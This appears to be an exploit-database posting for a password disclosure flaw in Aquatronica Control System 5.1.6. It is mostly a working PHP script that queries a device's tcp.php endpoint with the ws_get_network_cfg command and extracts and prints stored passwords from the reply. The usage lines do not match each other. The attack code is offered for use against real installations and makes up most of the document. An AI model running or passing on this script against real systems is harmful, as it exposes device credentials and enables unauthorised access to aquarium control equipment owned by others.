Share
## https://sploitus.com/exploit?id=PACKETSTORM:181854
=============================================================================================================================================  
| # Title : Aquatronica Control System 5.1.6 Hash Disclosure Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.1 (64 bits) |  
| # Vendor : https://www.aquatronica.com |  
=============================================================================================================================================  
  
poc :  
  
[+] Leak passwords in Aquatronica Control System v 5.1.6 has a tcp.php endpoint   
  
[+] save as poc.php  
  
[+] Usage : C:\www\test>php 3.php poc.php  
  
[+] payload :   
  
<?php  
  
// التأكد من توافر الوسائط المطلوبة  
if ($argc != 2) {  
echo "Usage: php aqua.php\n";  
exit(1);  
}  
  
$ip = $argv[1];  
$program = "TCP";  
$command = "ws_get_network_cfg";  
$function_id = "TCP_XML_REQUEST";  
  
  
// إنشاء عنوان URL لنقطة النهاية tcp.php  
$url = "http://$ip/" . strtolower($program) . ".php";  
  
// البيانات التي سيتم إرسالها في الطلب POST  
$post_data = [  
'function_id' => strtolower($function_id),  
'command' => strtoupper($command)  
];  
  
// إرسال الطلب باستخدام cURL  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
  
$response = curl_exec($ch);  
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);  
curl_close($ch);  
  
if ($http_code == 200) {  
// فك تشفير النصوص والإشارة المرجعية  
$decoded_response = urldecode($response);  
$final_response = htmlspecialchars_decode($decoded_response);  
  
// البحث عن كلمات المرور باستخدام التعبيرات النمطية  
preg_match_all('/pwd="([^"]+)"/', $final_response, $matches);  
  
if (!empty($matches[1])) {  
foreach ($matches[1] as $password) {  
echo " $password\n";  
sleep(1); // تأخير زمني بين الكلمات  
}  
} else {  
echo "No passwords found.\n";  
}  
} else {  
echo "Dry season! HTTP Code: $http_code\n";  
}  
?>  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================